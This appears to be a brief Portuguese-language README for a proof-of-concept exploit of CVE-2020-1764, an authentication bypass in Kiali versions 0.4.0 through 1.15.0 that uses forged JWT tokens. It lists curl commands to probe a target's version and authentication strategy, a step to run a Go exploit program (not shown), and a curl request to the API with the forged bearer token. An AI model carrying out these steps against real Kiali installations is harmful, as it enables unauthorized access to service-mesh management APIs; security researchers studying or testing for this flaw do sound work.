
Exploit de prova de conceito para bypass de autenticação CVE-2020-1764 no Kiali 0.4.0–1.15.0, permitindo acesso não autorizado à API via tokens JWT maliciosos.
Prova de Conceito de bypass de autenticação para Kiali 0.4.0 a 1.15.0 usando estratégia de autenticação de login (Boletim de Segurança)
verificar versão: curl 'http://<IP>/api
verificar estratégia de autenticação: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"